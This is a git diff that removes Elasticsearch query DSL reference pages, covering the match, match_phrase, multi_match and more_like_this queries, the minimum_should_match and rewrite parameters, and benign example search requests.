\ No newline at end of file diff --git a/docs/reference/query-dsl/match-phrase-query.asciidoc b/docs/reference/query-dsl/match-phrase-query.asciidoc deleted file mode 100644 index f6b0fa19001..00000000000 --- a/docs/reference/query-dsl/match-phrase-query.asciidoc +++ /dev/null @@ -1,44 +0,0 @@ -[[query-dsl-match-query-phrase]] -=== Match phrase query -++++ -Match phrase -++++ - -The `match_phrase` query analyzes the text and creates a `phrase` query -out of the analyzed text. For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_phrase": { - "message": "this is a test" - } - } -} --------------------------------------------------- - -A phrase query matches terms up to a configurable `slop` -(which defaults to 0) in any order. Transposed terms have a slop of 2. - -The `analyzer` can be set to control which analyzer will perform the -analysis process on the text. It defaults to the field explicit mapping -definition, or the default search analyzer, for example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_phrase": { - "message": { - "query": "this is a test", - "analyzer": "my_analyzer" - } - } - } -} --------------------------------------------------- - -This query also accepts `zero_terms_query`, as explained in <>. diff --git a/docs/reference/query-dsl/match-query.asciidoc b/docs/reference/query-dsl/match-query.asciidoc deleted file mode 100644 index 93303ef1047..00000000000 --- a/docs/reference/query-dsl/match-query.asciidoc +++ /dev/null @@ -1,334 +0,0 @@ -[[query-dsl-match-query]] -=== Match query -++++ -Match -++++ - -Returns documents that match a provided text, number, date or boolean value. The -provided text is analyzed before matching. - -The `match` query is the standard query for performing a full-text search, -including options for fuzzy matching. - - -[[match-query-ex-request]] -==== Example request - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { - "message": { - "query": "this is a test" - } - } - } -} --------------------------------------------------- - - -[[match-top-level-params]] -==== Top-level parameters for `match` - -``:: -(Required, object) Field you wish to search. - - -[[match-field-params]] -==== Parameters for `` -`query`:: -+ --- -(Required) Text, number, boolean value or date you wish to find in the provided -``. - -The `match` query <> any provided text before performing a -search. This means the `match` query can search <> fields for -analyzed tokens rather than an exact term. --- - -`analyzer`:: -(Optional, string) <> used to convert the text in the `query` -value into tokens. Defaults to the <> mapped for the ``. If no analyzer is mapped, the index's -default analyzer is used. - -`auto_generate_synonyms_phrase_query`:: -+ --- -(Optional, Boolean) If `true`, <> -queries are automatically created for multi-term synonyms. Defaults to `true`. - -See <> for an -example. --- - -`fuzziness`:: -(Optional, string) Maximum edit distance allowed for matching. See <> -for valid values and more information. See <> -for an example. - -`max_expansions`:: -(Optional, integer) Maximum number of terms to which the query will -expand. Defaults to `50`. - -`prefix_length`:: -(Optional, integer) Number of beginning characters left unchanged for fuzzy -matching. Defaults to `0`. 
- -`fuzzy_transpositions`:: -(Optional, Boolean) If `true`, edits for fuzzy matching include -transpositions of two adjacent characters (ab → ba). Defaults to `true`. - -`fuzzy_rewrite`:: -+ --- -(Optional, string) Method used to rewrite the query. See the -<> for valid values and more -information. - -If the `fuzziness` parameter is not `0`, the `match` query uses a `fuzzy_rewrite` -method of `top_terms_blended_freqs_${max_expansions}` by default. --- - -`lenient`:: -(Optional, Boolean) If `true`, format-based errors, such as providing a text -`query` value for a <> field, are ignored. Defaults to `false`. - -`operator`:: -+ --- -(Optional, string) Boolean logic used to interpret text in the `query` value. -Valid values are: - -`OR` (Default):: -For example, a `query` value of `capital of Hungary` is interpreted as `capital -OR of OR Hungary`. - -`AND`:: -For example, a `query` value of `capital of Hungary` is interpreted as `capital -AND of AND Hungary`. --- - -`minimum_should_match`:: -+ --- -(Optional, string) Minimum number of clauses that must match for a document to -be returned. See the <> for valid values and more information. --- - -`zero_terms_query`:: -+ --- -(Optional, string) Indicates whether no documents are returned if the `analyzer` -removes all tokens, such as when using a `stop` filter. Valid values are: - -`none` (Default):: -No documents are returned if the `analyzer` removes all tokens. - -`all`:: -Returns all documents, similar to a <> -query. - -See <> for an example. --- - - -[[match-query-notes]] -==== Notes - -[[query-dsl-match-query-short-ex]] -===== Short request example - -You can simplify the match query syntax by combining the `` and `query` -parameters. For example: - -[source,console] ----- -GET /_search -{ - "query": { - "match": { - "message": "this is a test" - } - } -} ----- - -[[query-dsl-match-query-boolean]] -===== How the match query works - -The `match` query is of type `boolean`. It means that the text -provided is analyzed and the analysis process constructs a boolean query -from the provided text. The `operator` parameter can be set to `or` or `and` -to control the boolean clauses (defaults to `or`). The minimum number of -optional `should` clauses to match can be set using the -<> -parameter. - -Here is an example with the `operator` parameter: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { - "message": { - "query": "this is a test", - "operator": "and" - } - } - } -} --------------------------------------------------- - -The `analyzer` can be set to control which analyzer will perform the -analysis process on the text. It defaults to the field explicit mapping -definition, or the default search analyzer. - -The `lenient` parameter can be set to `true` to ignore exceptions caused by -data-type mismatches, such as trying to query a numeric field with a text -query string. Defaults to `false`. - -[[query-dsl-match-query-fuzziness]] -===== Fuzziness in the match query - -`fuzziness` allows _fuzzy matching_ based on the type of field being queried. -See <> for allowed settings. - -The `prefix_length` and -`max_expansions` can be set in this case to control the fuzzy process. -If the fuzzy option is set the query will use `top_terms_blended_freqs_${max_expansions}` -as its <> the `fuzzy_rewrite` parameter allows to control how the query will get -rewritten. 
- -Fuzzy transpositions (`ab` -> `ba`) are allowed by default but can be disabled -by setting `fuzzy_transpositions` to `false`. - -NOTE: Fuzzy matching is not applied to terms with synonyms or in cases where the -analysis process produces multiple tokens at the same position. Under the hood -these terms are expanded to a special synonym query that blends term frequencies, -which does not support fuzzy expansion. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { - "message": { - "query": "this is a testt", - "fuzziness": "AUTO" - } - } - } -} --------------------------------------------------- - -[[query-dsl-match-query-zero]] -===== Zero terms query -If the analyzer used removes all tokens in a query like a `stop` filter -does, the default behavior is to match no documents at all. In order to -change that the `zero_terms_query` option can be used, which accepts -`none` (default) and `all` which corresponds to a `match_all` query. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { - "message": { - "query": "to be or not to be", - "operator": "and", - "zero_terms_query": "all" - } - } - } -} --------------------------------------------------- - -[[query-dsl-match-query-cutoff]] -===== Cutoff frequency - -deprecated[7.3.0,"This option can be omitted as the <> can skip blocks of documents efficiently, without any configuration, provided that the total number of hits is not tracked."] - -The match query supports a `cutoff_frequency` that allows -specifying an absolute or relative document frequency where high -frequency terms are moved into an optional subquery and are only scored -if one of the low frequency (below the cutoff) terms in the case of an -`or` operator or all of the low frequency terms in the case of an `and` -operator match. - -This query allows handling `stopwords` dynamically at runtime, is domain -independent and doesn't require a stopword file. It prevents scoring / -iterating high frequency terms and only takes the terms into account if a -more significant / lower frequency term matches a document. Yet, if all -of the query terms are above the given `cutoff_frequency` the query is -automatically transformed into a pure conjunction (`and`) query to -ensure fast execution. - -The `cutoff_frequency` can either be relative to the total number of -documents if in the range from 0 (inclusive) to 1 (exclusive) or absolute if greater or equal to -`1.0`. - -Here is an example showing a query composed of stopwords exclusively: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { - "message": { - "query": "to be or not to be", - "cutoff_frequency": 0.001 - } - } - } -} --------------------------------------------------- -// TEST[warning:Deprecated field [cutoff_frequency] used, replaced by [you can omit this option, the [match] query can skip block of documents efficiently if the total number of hits is not tracked]] - -IMPORTANT: The `cutoff_frequency` option operates on a per-shard-level. This means -that when trying it out on test indexes with low document numbers you -should follow the advice in {defguide}/relevance-is-broken.html[Relevance is broken]. - -[[query-dsl-match-query-synonyms]] -===== Synonyms - -The `match` query supports multi-terms synonym expansion with the <> token filter. When this filter is used, the parser creates a phrase query for each multi-terms synonyms. 
-For example, the following synonym: `"ny, new york"` would produce: - -`(ny OR ("new york"))` - -It is also possible to match multi terms synonyms with conjunctions instead: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match" : { - "message": { - "query" : "ny city", - "auto_generate_synonyms_phrase_query" : false - } - } - } -} --------------------------------------------------- - -The example above creates a boolean query: - -`(ny OR (new AND york)) city` - -that matches documents with the term `ny` or the conjunction `new AND york`. -By default the parameter `auto_generate_synonyms_phrase_query` is set to `true`. - diff --git a/docs/reference/query-dsl/minimum-should-match.asciidoc b/docs/reference/query-dsl/minimum-should-match.asciidoc deleted file mode 100644 index fc0479265fc..00000000000 --- a/docs/reference/query-dsl/minimum-should-match.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[[query-dsl-minimum-should-match]] -== `minimum_should_match` parameter - -The `minimum_should_match` parameter's possible values: - -[cols="<,<,<",options="header",] -|======================================================================= -|Type |Example |Description -|Integer |`3` |Indicates a fixed value regardless of the number of -optional clauses. - -|Negative integer |`-2` |Indicates that the total number of optional -clauses, minus this number should be mandatory. - -|Percentage |`75%` |Indicates that this percent of the total number of -optional clauses are necessary. The number computed from the percentage -is rounded down and used as the minimum. - -|Negative percentage |`-25%` |Indicates that this percent of the total -number of optional clauses can be missing. The number computed from the -percentage is rounded down, before being subtracted from the total to -determine the minimum. - -|Combination |`3<90%` |A positive integer, followed by the less-than -symbol, followed by any of the previously mentioned specifiers is a -conditional specification. It indicates that if the number of optional -clauses is equal to (or less than) the integer, they are all required, -but if it's greater than the integer, the specification applies. In this -example: if there are 1 to 3 clauses they are all required, but for 4 or -more clauses only 90% are required. - -|Multiple combinations |`2<-25% 9<-3` |Multiple conditional -specifications can be separated by spaces, each one only being valid for -numbers greater than the one before it. In this example: if there are 1 -or 2 clauses both are required, if there are 3-9 clauses all but 25% are -required, and if there are more than 9 clauses, all but three are -required. -|======================================================================= - -*NOTE:* - -When dealing with percentages, negative values can be used to get -different behavior in edge cases. 75% and -25% mean the same thing when -dealing with 4 clauses, but when dealing with 5 clauses 75% means 3 are -required, but -25% means 4 are required. - -If the calculations based on the specification determine that no -optional clauses are needed, the usual rules about BooleanQueries still -apply at search time (a BooleanQuery containing no required clauses must -still match at least one optional clause) - -No matter what number the calculation arrives at, a value greater than -the number of optional clauses, or a value less than 1 will never be -used. 
(ie: no matter how low or how high the result of the calculation -result is, the minimum number of required matches will never be lower -than 1 or greater than the number of clauses. diff --git a/docs/reference/query-dsl/mlt-query.asciidoc b/docs/reference/query-dsl/mlt-query.asciidoc deleted file mode 100644 index f54a6d03b12..00000000000 --- a/docs/reference/query-dsl/mlt-query.asciidoc +++ /dev/null @@ -1,252 +0,0 @@ -[[query-dsl-mlt-query]] -=== More like this query -++++ -More like this -++++ - -The More Like This Query finds documents that are "like" a given -set of documents. In order to do so, MLT selects a set of representative terms -of these input documents, forms a query using these terms, executes the query -and returns the results. The user controls the input documents, how the terms -should be selected and how the query is formed. - -The simplest use case consists of asking for documents that are similar to a -provided piece of text. Here, we are asking for all movies that have some text -similar to "Once upon a time" in their "title" and in their "description" -fields, limiting the number of selected terms to 12. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "more_like_this" : { - "fields" : ["title", "description"], - "like" : "Once upon a time", - "min_term_freq" : 1, - "max_query_terms" : 12 - } - } -} --------------------------------------------------- - -A more complicated use case consists of mixing texts with documents already -existing in the index. In this case, the syntax to specify a document is -similar to the one used in the <>. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "more_like_this": { - "fields": [ "title", "description" ], - "like": [ - { - "_index": "imdb", - "_id": "1" - }, - { - "_index": "imdb", - "_id": "2" - }, - "and potentially some more text here as well" - ], - "min_term_freq": 1, - "max_query_terms": 12 - } - } -} --------------------------------------------------- - -Finally, users can mix some texts, a chosen set of documents but also provide -documents not necessarily present in the index. To provide documents not -present in the index, the syntax is similar to <>. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "more_like_this": { - "fields": [ "name.first", "name.last" ], - "like": [ - { - "_index": "marvel", - "doc": { - "name": { - "first": "Ben", - "last": "Grimm" - }, - "_doc": "You got no idea what I'd... what I'd give to be invisible." - } - }, - { - "_index": "marvel", - "_id": "2" - } - ], - "min_term_freq": 1, - "max_query_terms": 12 - } - } -} --------------------------------------------------- - -==== How it Works - -Suppose we wanted to find all documents similar to a given input document. -Obviously, the input document itself should be its best match for that type of -query. And the reason would be mostly, according to -link:https://lucene.apache.org/core/4_9_0/core/org/apache/lucene/search/similarities/TFIDFSimilarity.html[Lucene scoring formula], -due to the terms with the highest tf-idf. Therefore, the terms of the input -document that have the highest tf-idf are good representatives of that -document, and could be used within a disjunctive query (or `OR`) to retrieve similar -documents. 
The MLT query simply extracts the text from the input document, -analyzes it, usually using the same analyzer at the field, then selects the -top K terms with highest tf-idf to form a disjunctive query of these terms. - -IMPORTANT: The fields on which to perform MLT must be indexed and of type -`text` or `keyword``. Additionally, when using `like` with documents, either -`_source` must be enabled or the fields must be `stored` or store -`term_vector`. In order to speed up analysis, it could help to store term -vectors at index time. - -For example, if we wish to perform MLT on the "title" and "tags.raw" fields, -we can explicitly store their `term_vector` at index time. We can still -perform MLT on the "description" and "tags" fields, as `_source` is enabled by -default, but there will be no speed up on analysis for these fields. - -[source,console] --------------------------------------------------- -PUT /imdb -{ - "mappings": { - "properties": { - "title": { - "type": "text", - "term_vector": "yes" - }, - "description": { - "type": "text" - }, - "tags": { - "type": "text", - "fields": { - "raw": { - "type": "text", - "analyzer": "keyword", - "term_vector": "yes" - } - } - } - } - } -} --------------------------------------------------- - -==== Parameters - -The only required parameter is `like`, all other parameters have sensible -defaults. There are three types of parameters: one to specify the document -input, the other one for term selection and for query formation. - -[discrete] -==== Document Input Parameters - -[horizontal] -`like`:: -The only *required* parameter of the MLT query is `like` and follows a -versatile syntax, in which the user can specify free form text and/or a single -or multiple documents (see examples above). The syntax to specify documents is -similar to the one used by the <>. When -specifying documents, the text is fetched from `fields` unless overridden in -each document request. The text is analyzed by the analyzer at the field, but -could also be overridden. The syntax to override the analyzer at the field -follows a similar syntax to the `per_field_analyzer` parameter of the -<>. -Additionally, to provide documents not necessarily present in the index, -<> are also supported. - -`unlike`:: -The `unlike` parameter is used in conjunction with `like` in order not to -select terms found in a chosen set of documents. In other words, we could ask -for documents `like: "Apple"`, but `unlike: "cake crumble tree"`. The syntax -is the same as `like`. - -`fields`:: -A list of fields to fetch and analyze the text from. - -[discrete] -[[mlt-query-term-selection]] -==== Term Selection Parameters - -[horizontal] -`max_query_terms`:: -The maximum number of query terms that will be selected. Increasing this value -gives greater accuracy at the expense of query execution speed. Defaults to -`25`. - -`min_term_freq`:: -The minimum term frequency below which the terms will be ignored from the -input document. Defaults to `2`. - -`min_doc_freq`:: -The minimum document frequency below which the terms will be ignored from the -input document. Defaults to `5`. - -`max_doc_freq`:: -The maximum document frequency above which the terms will be ignored from the -input document. This could be useful in order to ignore highly frequent words -such as stop words. Defaults to unbounded (`Integer.MAX_VALUE`, which is `2^31-1` -or 2147483647). - -`min_word_length`:: -The minimum word length below which the terms will be ignored. The old name -`min_word_len` is deprecated. Defaults to `0`. 
- -`max_word_length`:: -The maximum word length above which the terms will be ignored. The old name -`max_word_len` is deprecated. Defaults to unbounded (`0`). - -`stop_words`:: -An array of stop words. Any word in this set is considered "uninteresting" and -ignored. If the analyzer allows for stop words, you might want to tell MLT to -explicitly ignore them, as for the purposes of document similarity it seems -reasonable to assume that "a stop word is never interesting". - -`analyzer`:: -The analyzer that is used to analyze the free form text. Defaults to the -analyzer associated with the first field in `fields`. - -[discrete] -==== Query Formation Parameters - -[horizontal] -`minimum_should_match`:: -After the disjunctive query has been formed, this parameter controls the -number of terms that must match. -The syntax is the same as the <>. -(Defaults to `"30%"`). - -`fail_on_unsupported_field`:: -Controls whether the query should fail (throw an exception) if any of the -specified fields are not of the supported types -(`text` or `keyword`). Set this to `false` to ignore the field and continue -processing. Defaults to `true`. - -`boost_terms`:: -Each term in the formed query could be further boosted by their tf-idf score. -This sets the boost factor to use when using this feature. Defaults to -deactivated (`0`). Any other positive value activates terms boosting with the -given boost factor. - -`include`:: -Specifies whether the input documents should also be included in the search -results returned. Defaults to `false`. - -`boost`:: -Sets the boost value of the whole query. Defaults to `1.0`. - -==== Alternative -To take more control over the construction of a query for similar documents it is worth considering writing custom client code to assemble selected terms from an example document into a Boolean query with the desired settings. The logic in `more_like_this` that selects "interesting" words from a piece of text is also accessible via the <>. For example, using the termvectors API it would be possible to present users with a selection of topical keywords found in a document's text, allowing them to select words of interest to drill down on, rather than using the more "black-box" approach of matching used by `more_like_this`. diff --git a/docs/reference/query-dsl/multi-match-query.asciidoc b/docs/reference/query-dsl/multi-match-query.asciidoc deleted file mode 100644 index c5b3943f5be..00000000000 --- a/docs/reference/query-dsl/multi-match-query.asciidoc +++ /dev/null @@ -1,552 +0,0 @@ -[[query-dsl-multi-match-query]] -=== Multi-match query -++++ -Multi-match -++++ - -The `multi_match` query builds on the <> -to allow multi-field queries: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "this is a test", <1> - "fields": [ "subject", "message" ] <2> - } - } -} --------------------------------------------------- - -<1> The query string. -<2> The fields to be queried. - -[discrete] -[[field-boost]] -==== `fields` and per-field boosting - -Fields can be specified with wildcards, eg: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "Will Smith", - "fields": [ "title", "*_name" ] <1> - } - } -} --------------------------------------------------- - -<1> Query the `title`, `first_name` and `last_name` fields. 
- -Individual fields can be boosted with the caret (`^`) notation: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query" : "this is a test", - "fields" : [ "subject^3", "message" ] <1> - } - } -} --------------------------------------------------- - -<1> The query multiplies the `subject` field's score by three but leaves the -`message` field's score unchanged. - -If no `fields` are provided, the `multi_match` query defaults to the `index.query.default_field` -index settings, which in turn defaults to `*`. `*` extracts all fields in the mapping that -are eligible to term queries and filters the metadata fields. All extracted fields are then -combined to build a query. - -WARNING: There is a limit on the number of fields that can be queried -at once. It is defined by the `indices.query.bool.max_clause_count` <> -which defaults to 1024. - -[[multi-match-types]] -[discrete] -==== Types of `multi_match` query: - -The way the `multi_match` query is executed internally depends on the `type` -parameter, which can be set to: - -[horizontal] -`best_fields`:: (*default*) Finds documents which match any field, but - uses the `_score` from the best field. See <>. - -`most_fields`:: Finds documents which match any field and combines - the `_score` from each field. See <>. - -`cross_fields`:: Treats fields with the same `analyzer` as though they - were one big field. Looks for each word in *any* - field. See <>. - -`phrase`:: Runs a `match_phrase` query on each field and uses the `_score` - from the best field. See <>. - -`phrase_prefix`:: Runs a `match_phrase_prefix` query on each field and uses - the `_score` from the best field. See <>. - -`bool_prefix`:: Creates a `match_bool_prefix` query on each field and - combines the `_score` from each field. See - <>. - -[[type-best-fields]] -==== `best_fields` - -The `best_fields` type is most useful when you are searching for multiple -words best found in the same field. For instance ``brown fox'' in a single -field is more meaningful than ``brown'' in one field and ``fox'' in the other. - -The `best_fields` type generates a <> for -each field and wraps them in a <> query, to -find the single best matching field. For instance, this query: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "brown fox", - "type": "best_fields", - "fields": [ "subject", "message" ], - "tie_breaker": 0.3 - } - } -} --------------------------------------------------- - -would be executed as: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "dis_max": { - "queries": [ - { "match": { "subject": "brown fox" }}, - { "match": { "message": "brown fox" }} - ], - "tie_breaker": 0.3 - } - } -} --------------------------------------------------- - -Normally the `best_fields` type uses the score of the *single* best matching -field, but if `tie_breaker` is specified, then it calculates the score as -follows: - - * the score from the best matching field - * plus `tie_breaker * _score` for all other matching fields - -Also, accepts `analyzer`, `boost`, `operator`, `minimum_should_match`, -`fuzziness`, `lenient`, `prefix_length`, `max_expansions`, `fuzzy_rewrite`, `zero_terms_query`, - `cutoff_frequency`, `auto_generate_synonyms_phrase_query` and `fuzzy_transpositions`, - as explained in <>. 
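- -For instance, a minimal sketch (reusing the `subject` and `message` fields from the examples above, with purely illustrative values) might combine `best_fields` with `fuzziness` and `minimum_should_match`: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "brwon fox", - "type": "best_fields", - "fields": [ "subject", "message" ], - "fuzziness": "AUTO", - "minimum_should_match": "75%", - "tie_breaker": 0.3 - } - } -} --------------------------------------------------- - -Here `fuzziness` lets the misspelled `brwon` still match `brown`, while `tie_breaker` blends in the scores of the other matching fields as described above. Keep in mind that `minimum_should_match` is applied per field, as explained next.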
- -[IMPORTANT] -[[operator-min]] -.`operator` and `minimum_should_match` -=================================================== - -The `best_fields` and `most_fields` types are _field-centric_ -- they generate -a `match` query *per field*. This means that the `operator` and -`minimum_should_match` parameters are applied to each field individually, -which is probably not what you want. - -Take this query for example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "Will Smith", - "type": "best_fields", - "fields": [ "first_name", "last_name" ], - "operator": "and" <1> - } - } -} --------------------------------------------------- - -<1> All terms must be present. - -This query is executed as: - - (+first_name:will +first_name:smith) - | (+last_name:will +last_name:smith) - -In other words, *all terms* must be present *in a single field* for a document -to match. - -See <> for a better solution. - -=================================================== - -[[type-most-fields]] -==== `most_fields` - -The `most_fields` type is most useful when querying multiple fields that -contain the same text analyzed in different ways. For instance, the main -field may contain synonyms, stemming and terms without diacritics. A second -field may contain the original terms, and a third field might contain -shingles. By combining scores from all three fields we can match as many -documents as possible with the main field, but use the second and third fields -to push the most similar results to the top of the list. - -This query: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "quick brown fox", - "type": "most_fields", - "fields": [ "title", "title.original", "title.shingles" ] - } - } -} --------------------------------------------------- - -would be executed as: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "should": [ - { "match": { "title": "quick brown fox" }}, - { "match": { "title.original": "quick brown fox" }}, - { "match": { "title.shingles": "quick brown fox" }} - ] - } - } -} --------------------------------------------------- - -The score from each `match` clause is added together, then divided by the -number of `match` clauses. - -Also, accepts `analyzer`, `boost`, `operator`, `minimum_should_match`, -`fuzziness`, `lenient`, `prefix_length`, `max_expansions`, `fuzzy_rewrite`, `zero_terms_query` -and `cutoff_frequency`, as explained in <>, but -*see <>*. - -[[type-phrase]] -==== `phrase` and `phrase_prefix` - -The `phrase` and `phrase_prefix` types behave just like <>, -but they use a `match_phrase` or `match_phrase_prefix` query instead of a -`match` query. 
- -This query: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "quick brown f", - "type": "phrase_prefix", - "fields": [ "subject", "message" ] - } - } -} --------------------------------------------------- - -would be executed as: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "dis_max": { - "queries": [ - { "match_phrase_prefix": { "subject": "quick brown f" }}, - { "match_phrase_prefix": { "message": "quick brown f" }} - ] - } - } -} --------------------------------------------------- - -Also, accepts `analyzer`, <>, `lenient` and `zero_terms_query` as explained -in <>, as well as `slop` which is explained in <>. -Type `phrase_prefix` additionally accepts `max_expansions`. - -[IMPORTANT] -[[phrase-fuzziness]] -.`phrase`, `phrase_prefix` and `fuzziness` -=================================================== -The `fuzziness` parameter cannot be used with the `phrase` or `phrase_prefix` type. -=================================================== - -[[type-cross-fields]] -==== `cross_fields` - -The `cross_fields` type is particularly useful with structured documents where -multiple fields *should* match. For instance, when querying the `first_name` -and `last_name` fields for ``Will Smith'', the best match is likely to have -``Will'' in one field and ``Smith'' in the other. - -**** - -This sounds like a job for <> but there are two problems -with that approach. The first problem is that `operator` and -`minimum_should_match` are applied per-field, instead of per-term (see -<>). - -The second problem is to do with relevance: the different term frequencies in -the `first_name` and `last_name` fields can produce unexpected results. - -For instance, imagine we have two people: ``Will Smith'' and ``Smith Jones''. -``Smith'' as a last name is very common (and so is of low importance) but -``Smith'' as a first name is very uncommon (and so is of great importance). - -If we do a search for ``Will Smith'', the ``Smith Jones'' document will -probably appear above the better matching ``Will Smith'' because the score of -`first_name:smith` has trumped the combined scores of `first_name:will` plus -`last_name:smith`. - -**** - -One way of dealing with these types of queries is simply to index the -`first_name` and `last_name` fields into a single `full_name` field. Of -course, this can only be done at index time. - -The `cross_field` type tries to solve these problems at query time by taking a -_term-centric_ approach. It first analyzes the query string into individual -terms, then looks for each term in any of the fields, as though they were one -big field. - -A query like: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "Will Smith", - "type": "cross_fields", - "fields": [ "first_name", "last_name" ], - "operator": "and" - } - } -} --------------------------------------------------- - -is executed as: - - +(first_name:will last_name:will) - +(first_name:smith last_name:smith) - -In other words, *all terms* must be present *in at least one field* for a -document to match. (Compare this to -<>.) - -That solves one of the two problems. The problem of differing term frequencies -is solved by _blending_ the term frequencies for all fields in order to even -out the differences. 
- -In practice, `first_name:smith` will be treated as though it has the same -frequencies as `last_name:smith`, plus one. This will make matches on -`first_name` and `last_name` have comparable scores, with a tiny advantage -for `last_name` since it is the most likely field that contains `smith`. - -Note that `cross_fields` is usually only useful on short string fields -that all have a `boost` of `1`. Otherwise boosts, term freqs and length -normalization contribute to the score in such a way that the blending of term -statistics is not meaningful anymore. - -If you run the above query through the <>, it returns this -explanation: - - +blended("will", fields: [first_name, last_name]) - +blended("smith", fields: [first_name, last_name]) - -Also, accepts `analyzer`, `boost`, `operator`, `minimum_should_match`, -`lenient`, `zero_terms_query` and `cutoff_frequency`, as explained in -<>. - -[[cross-field-analysis]] -===== `cross_field` and analysis - -The `cross_field` type can only work in term-centric mode on fields that have -the same analyzer. Fields with the same analyzer are grouped together as in -the example above. If there are multiple groups, they are combined with a -`bool` query. - -For instance, if we have a `first` and `last` field which have -the same analyzer, plus a `first.edge` and `last.edge` which -both use an `edge_ngram` analyzer, this query: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "Jon", - "type": "cross_fields", - "fields": [ - "first", "first.edge", - "last", "last.edge" - ] - } - } -} --------------------------------------------------- - -would be executed as: - - blended("jon", fields: [first, last]) - | ( - blended("j", fields: [first.edge, last.edge]) - blended("jo", fields: [first.edge, last.edge]) - blended("jon", fields: [first.edge, last.edge]) - ) - -In other words, `first` and `last` would be grouped together and -treated as a single field, and `first.edge` and `last.edge` would be -grouped together and treated as a single field. - -Having multiple groups is fine, but when combined with `operator` or -`minimum_should_match`, it can suffer from the <> -as `most_fields` or `best_fields`. - -You can easily rewrite this query yourself as two separate `cross_fields` -queries combined with a `bool` query, and apply the `minimum_should_match` -parameter to just one of them: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "should": [ - { - "multi_match" : { - "query": "Will Smith", - "type": "cross_fields", - "fields": [ "first", "last" ], - "minimum_should_match": "50%" <1> - } - }, - { - "multi_match" : { - "query": "Will Smith", - "type": "cross_fields", - "fields": [ "*.edge" ] - } - } - ] - } - } -} --------------------------------------------------- - -<1> Either `will` or `smith` must be present in either of the `first` - or `last` fields - -You can force all fields into the same group by specifying the `analyzer` -parameter in the query. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "Jon", - "type": "cross_fields", - "analyzer": "standard", <1> - "fields": [ "first", "last", "*.edge" ] - } - } -} --------------------------------------------------- - -<1> Use the `standard` analyzer for all fields. 
- -which will be executed as: - - blended("jon", fields: [first, first.edge, last.edge, last]) - -[[tie-breaker]] -===== `tie_breaker` - -By default, each per-term `blended` query will use the best score returned by -any field in a group, then these scores are added together to give the final -score. The `tie_breaker` parameter can change the default behaviour of the -per-term `blended` queries. It accepts: - -[horizontal] -`0.0`:: Take the single best score out of (eg) `first_name:will` - and `last_name:will` (*default* for all `multi_match` - query types except `bool_prefix` and `most_fields`) -`1.0`:: Add together the scores for (eg) `first_name:will` and - `last_name:will` (*default* for the `bool_prefix` and - `most_fields` `multi_match` query types) -`0.0 < n < 1.0`:: Take the single best score plus +tie_breaker+ multiplied - by each of the scores from other matching fields. - -[IMPORTANT] -[[crossfields-fuzziness]] -.`cross_fields` and `fuzziness` -=================================================== -The `fuzziness` parameter cannot be used with the `cross_fields` type. -=================================================== - -[[type-bool-prefix]] -==== `bool_prefix` - -The `bool_prefix` type's scoring behaves like <>, but using a -<> instead of a -`match` query. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "multi_match" : { - "query": "quick brown f", - "type": "bool_prefix", - "fields": [ "subject", "message" ] - } - } -} --------------------------------------------------- - -The `analyzer`, `boost`, `operator`, `minimum_should_match`, `lenient`, -`zero_terms_query`, and `auto_generate_synonyms_phrase_query` parameters as -explained in <> are supported. The -`fuzziness`, `prefix_length`, `max_expansions`, `fuzzy_rewrite`, and -`fuzzy_transpositions` parameters are supported for the terms that are used to -construct term queries, but do not have an effect on the prefix query -constructed from the final term. - -The `slop` and `cutoff_frequency` parameters are not supported by this query -type. diff --git a/docs/reference/query-dsl/multi-term-rewrite.asciidoc b/docs/reference/query-dsl/multi-term-rewrite.asciidoc deleted file mode 100644 index fe415f4eb5b..00000000000 --- a/docs/reference/query-dsl/multi-term-rewrite.asciidoc +++ /dev/null @@ -1,109 +0,0 @@ -[[query-dsl-multi-term-rewrite]] -== `rewrite` parameter - -WARNING: This parameter is for expert users only. Changing the value of -this parameter can impact search performance and relevance. - -{es} uses https://lucene.apache.org/core/[Apache Lucene] internally to power -indexing and searching. Lucene cannot execute the following queries in their -original form: - -* <> -* <> -* <> -* <> -* <> - -To execute them, Lucene changes these queries to a simpler form, such as a -<> or a -{wikipedia}/Bit_array[bit set]. - -The `rewrite` parameter determines: - -* How Lucene calculates the relevance scores for each matching document -* Whether Lucene changes the original query to a `bool` -query or bit set -* If changed to a `bool` query, which `term` query clauses are included - -[discrete] -[[rewrite-param-valid-values]] -=== Valid values - -`constant_score` (Default):: -Uses the `constant_score_boolean` method for fewer matching terms. Otherwise, -this method finds all matching terms in sequence and returns matching documents -using a bit set.
